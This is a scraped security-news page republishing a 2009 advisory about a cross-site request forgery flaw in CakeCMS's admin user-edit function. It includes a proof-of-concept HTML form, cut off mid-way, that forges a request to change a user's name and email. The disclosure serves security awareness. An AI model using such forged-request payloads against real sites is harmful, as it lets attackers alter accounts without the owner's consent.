Computer Security

Security Advisory: CakeCMS XSRF Vulnerability
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  [waraxe-2009-SA#074] - Multiple Vulnerabilities in TorrentTrader Classic 1.09

  SugarCRM 5.2.0e Remote Code Execution

  [InterN0T] Pivot 1.40.4-7 - Multiple Vulnerabilities

  [InterN0T] SkyBlueCanvas 1.1 r237 - Multiple Vulnerabilities

From:onur.turkeshan_(at)_hotmail.com <onur.turkeshan_(at)_hotmail.com>
Date:16.06.2009
Subject:CakeCMS XSRF Vulnerability

< ------------------- header data start ------------------- >

#########################################################

# Application Name : CakeCMS

# Vulnerable Type : Edıt USER (XSRF) Vuln

# author : MnmL ~ Bug Researchers


#############################################################

< ------------------- header data end of ------------------- >


< -- bug code start -- >
<form action="SITE.COM/admin/users/edit/41" method="post" id="UserEditForm"><fieldset
style="display: none;"><input type="hidden" value="PUT" name="_method"/></fieldset> <input
type="hidden" id="UserId" value="41" name="data[User][id]"/>
User Name : <input type="text" name="data[User][name]" size="86" maxlength="50" value="dsada"
id="UserName"/>
E-Mail : <input type="text" name="data[User][email]" size="86" maxlength="100"
value="dsada@dsada.com" id="UserEmail"/>
About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 


Rating@Mail.ru